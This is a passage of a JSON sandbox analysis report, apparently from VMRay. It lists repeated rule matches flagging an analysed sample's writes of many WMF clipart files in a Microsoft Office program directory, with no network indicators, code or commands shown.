office\\clipart\\pub60cor\\j0105496.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34835", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34842", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34849", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34856", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34863", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34872", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34881", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34888", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34897", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34904", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34911", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34918", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34925", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34932", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34939", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34946", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34953", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34962", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34969", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34978", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34985", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34992", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34999", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35006", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35013", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35020", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35027", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35036", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35047", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35058", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35067", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35074", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35083", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf\".", 